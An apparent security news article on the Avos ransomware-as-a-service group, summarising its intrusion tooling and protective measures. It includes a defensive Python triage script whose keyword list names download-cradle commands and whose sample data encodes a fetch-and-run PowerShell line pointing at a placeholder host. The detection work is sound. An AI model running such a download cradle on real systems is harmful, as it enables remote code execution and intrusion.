Avos ransomware threat actor updates its attack arsenal


The Avos ransomware threat actor has recently updated its tooling, using not only malicious software but also commercial products.

Image: Yingyaipumi/Adobe Stock
A new report from Cisco Talos Intelligence Group reveals new tools used in Avos ransomware attacks.
Who is Avos?
Avos is a ransomware group active since July 2021. The group follows the Ransomware as a Service business model, which means it offers ransomware services to different affiliates (Figure A).
Figure A.
Image: Avos website. AvosLocker services for its affiliates.
AvosLocker currently supports Windows, Linux and ESXi environments and offers automatic, highly configurable builds of the AvosLocker malware. In addition, the threat actor provides a control panel for the affiliates, a negotiation panel with push and sound notifications, decryption tests, and access to a diverse network of penetration testers, initial access brokers and other contacts.
Avos also offers calling services and DDoS attacks: it makes phone calls to victims to push them to pay the ransom, and it runs DDoS attacks during the negotiation to add pressure to the situation.


AvosLocker has already targeted critical infrastructure in the US, such as financial services, manufacturing and government facilities, according to the FBI. The Avos group does not allow attacks against post-Soviet Union countries. A user nicknamed “Avos” has been observed trying to recruit penetration testers with experience in Active Directory networks, as well as initial access brokers, on a Russian online forum.
In late 2021, the group apologized for one attack aimed at a U.S. police agency and provided a free and immediate decryptor for all the data that had been encrypted. An affiliate had successfully targeted that police agency, probably without realizing it, so the Avos group decided to provide the decryption to the agency.
AvosLocker infections & tools
Spam email campaigns are used as an initial infection vector to gain a foothold in the targeted network before deploying the ransomware.
Other techniques may be used for the initial infection. Talos observed a case where the initial compromise was achieved through an ESXi server exposed on the internet via VMware Horizon Unified Access Gateways (UAG) and vulnerable to the Log4Shell vulnerability.
Once inside the compromised network, the attackers used a number of malicious tools on endpoints. They also used LoLBins (Living-off-the-Land Binaries), which are non-malicious binaries already installed on operating systems, such as the WMI Provider Host (wmiprvse.exe).
Four weeks after the initial compromise, the threat actor ran an encoded PowerShell command that used DownloadString. In the following days, several PowerShell commands were run to download additional files and tools such as Mimikatz and Cobalt Strike beacons. A port scanner known as the SoftPerfect Network Scanner was also downloaded and used. This port scanner is a commercially available tool, and Avos is known to make frequent use of it. The cybercriminals then modified administrative settings on a remote and a local host to prepare for the lateral movement stage of the attack.
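The encoded PowerShell command with DownloadString described above is a common detection opportunity, because PowerShell's `-EncodedCommand` argument is just base64 over UTF-16LE text and can be decoded by a log pipeline before matching. The script below is an added example written for this article, not code from the Talos report or from Avos tooling: it decodes encoded PowerShell command lines from process-creation records, looks for download-cradle keywords (DownloadString and a few common variants, an assumed list) and for unusual parent processes such as wmiprvse.exe (also an assumed list), and raises a finding only when at least two signals coincide. The record field names (`host`, `parent`, `cmdline`) and the sample records are constructed for the example.

```python
"""Triage helper for encoded PowerShell download cradles (added example).

Operates on process-creation records such as a Sysmon or Security 4688
collector would export. Field names and detection lists are assumptions.
"""
import base64
import re
from dataclasses import dataclass

# DownloadString is what the report mentions; the rest are common variants (assumed list).
CRADLE_TOKENS = ("downloadstring", "downloadfile", "invoke-webrequest",
                 "iwr ", "invoke-expression", "iex ")

# Legitimate binaries that should rarely spawn PowerShell (assumed list).
SUSPICIOUS_PARENTS = {"wmiprvse.exe", "anydesk.exe", "pdqdeployservice.exe"}

# PowerShell accepts any unambiguous prefix of -EncodedCommand.
ENCODED_FLAG = re.compile(
    r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")


@dataclass
class Finding:
    host: str
    parent: str
    decoded: str
    reasons: list


def decode_encoded_command(cmdline):
    """Return the decoded script if cmdline carries -EncodedCommand, else None.

    PowerShell expects base64 of the script as UTF-16LE, so decode in that order.
    """
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(record):
    """Score one process-creation record; return a Finding or None."""
    reasons = []
    cmd = record["cmdline"]
    decoded = decode_encoded_command(cmd)
    script = decoded if decoded is not None else cmd
    if decoded is not None:
        reasons.append("encoded PowerShell command")
    low = script.lower()
    hits = [t.strip() for t in CRADLE_TOKENS if t in low]
    if hits:
        reasons.append("download cradle: " + ", ".join(hits))
    parent = record["parent"].lower()
    if parent in SUSPICIOUS_PARENTS:
        reasons.append(f"launched by {parent}")
    # Require two independent signals to keep noise from admin scripts down.
    if len(reasons) >= 2:
        return Finding(record["host"], parent, script, reasons)
    return None


def encode_for_powershell(script):
    """Build an -EncodedCommand argument; used here only to construct sample data."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample records: one benign, one cradle spawned by wmiprvse.exe,
# one ordinary admin script with an -ExecutionPolicy flag that must not match.
SAMPLE_RECORDS = [
    {"host": "ws01", "parent": "explorer.exe",
     "cmdline": "powershell.exe -NoProfile -Command Get-Date"},
    {"host": "srv02", "parent": "wmiprvse.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + encode_for_powershell(
         "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage.ps1')")},
    {"host": "srv03", "parent": "cmd.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"},
]


def triage(records):
    """Run analyze() over a batch and keep only records that produced a finding."""
    return [f for f in (analyze(r) for r in records) if f is not None]


if __name__ == "__main__":
    for f in triage(SAMPLE_RECORDS):
        print(f.host, f.parent, "|", "; ".join(f.reasons))
```

Decoding before matching matters because the keyword never appears in the raw command line of an encoded command; a rule that only greps for `DownloadString` in 4688 data would miss exactly the case Talos describes. The two-signal threshold is a tuning choice: an encoded command alone is common in legitimate automation, but an encoded command that also fetches remote content, or that is spawned by the WMI Provider Host, is worth an analyst's attention.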
Another instance of the port scanner was transferred via AnyDesk to another server in the compromised network.
Once all reconnaissance and lateral movement have been completed, the attackers use a legitimate software deployment tool called PDQ Deploy to spread the ransomware and other tools across the target network.
In the past, Avos attacks have also revealed the use of other tools: the PuTTY Secure Copy client tool (pscp.exe), Rclone, Advanced IP Scanner and WinLister.
At the end of the process, victims are shown a ransom note (Figure B).
Figure B.
Image: Cisco Talos. Ransom note from the AvosLocker ransomware.
Avos victims who do not pay have their data sold, as stated on the Avos site: “All information is FOR SALE. Contact us with your deals. We only sell data to 3rd parties if the owner of said information refuses to pay.”
How to protect yourself from Avos
Network segmentation should be implemented to reduce the risk of the entire organization being shut down by ransomware. Strong backup policies also need to be in place to avoid losing data in case of a successful attack.
Multi-factor authentication should be deployed for every Internet-facing service, especially VPN access and webmail systems. Access should be configured with the least privileges.
Antivirus and security solutions need to be deployed in order to detect the threat. Real-time protection should always be enabled. All systems and software need to be up to date and patched to avoid falling victim to common vulnerabilities.
Training and awareness should be provided for every employee, especially to help them identify phishing emails or any social engineering technique that may target the user.
Disclosure: I work for Trend Micro, but the views revealed in this article are mine.